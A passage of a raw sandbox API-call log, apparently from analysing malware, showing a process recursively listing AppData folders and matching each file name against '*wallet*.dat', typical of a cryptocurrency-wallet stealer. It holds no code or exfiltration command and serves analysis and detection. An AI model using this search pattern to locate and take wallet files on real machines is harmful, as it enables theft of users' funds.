dwReserved0=0x0, dwReserved1=0x18, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0175.471] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 66 [0175.471] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\SystemCertificates") returned 28 [0175.471] PathMatchSpecA (pszFile="SystemCertificates", pszSpec="*wallet*.dat") returned 0 [0175.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.471] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.471] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="My", cAlternateFileName="")) returned 1 [0175.471] PathMatchSpecA (pszFile="My", pszSpec="*wallet*.dat") returned 0 [0175.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.472] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.472] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0175.472] PathMatchSpecA (pszFile="AppContainerUserCertRead", pszSpec="*wallet*.dat") returned 0 [0175.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\appcontainerusercertread\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x5ec61c93, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5ec61c93, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x5ec61c93, ftLastWriteTime.dwLowDateTime=0x1d70068, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x700041, cFileName="p", cAlternateFileName="C")) returned 0xffffffff [0175.472] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0175.472] PathMatchSpecA (pszFile="Certificates", pszSpec="*wallet*.dat") returned 0 [0175.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea8d0 [0175.472] FindNextFileA (in: hFindFile=0x4ea8d0, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.473] FindNextFileA (in: hFindFile=0x4ea8d0, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.473] FindClose (in: hFindFile=0x4ea8d0 | out: hFindFile=0x4ea8d0) returned 1 [0175.473] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0175.473] PathMatchSpecA (pszFile="CRLs", pszSpec="*wallet*.dat") returned 0 [0175.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea910 [0175.473] FindNextFileA (in: hFindFile=0x4ea910, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.473] FindNextFileA (in: hFindFile=0x4ea910, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.473] FindClose (in: hFindFile=0x4ea910 | out: hFindFile=0x4ea910) returned 1 [0175.473] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0175.473] PathMatchSpecA (pszFile="CTLs", pszSpec="*wallet*.dat") returned 0 [0175.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ead50 [0175.474] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.474] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.474] FindClose (in: hFindFile=0x4ead50 | out: hFindFile=0x4ead50) returned 1 [0175.474] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="CTLs", cAlternateFileName="")) returned 0 [0175.474] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.474] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="My", cAlternateFileName="")) returned 0 [0175.474] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.474] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x6aa33cc5, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x6aa33cc5, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0175.474] PathMatchSpecA (pszFile="Templates", pszSpec="*wallet*.dat") returned 0 [0175.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x6aa33cc5, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x6aa33cc5, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.475] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x6aa33cc5, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x6aa33cc5, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.475] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0175.475] PathMatchSpecA (pszFile="LiveContent", pszSpec="*wallet*.dat") returned 0 [0175.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.476] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.476] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0175.476] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0175.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ead10 [0175.477] FindNextFileA (in: hFindFile=0x4ead10, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.477] FindNextFileA (in: hFindFile=0x4ead10, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Managed", cAlternateFileName="")) returned 1 [0175.477] PathMatchSpecA (pszFile="Managed", pszSpec="*wallet*.dat") returned 0 [0175.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ead50 [0175.480] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.480] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0175.480] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0175.480] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eabd0 [0175.481] FindNextFileA (in: hFindFile=0x4eabd0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.481] FindNextFileA (in: hFindFile=0x4eabd0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName="1033", cAlternateFileName="")) returned 1 [0175.481] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.481] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eac10 [0175.483] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.485] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9826b304, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9826b304, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x70d51000, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x893c1, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03090430[[fn=Banded]].thmx", cAlternateFileName="TM0309~1.THM")) returned 1 [0175.485] PathMatchSpecA (pszFile="TM03090430[[fn=Banded]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.485] FindFirstFileA 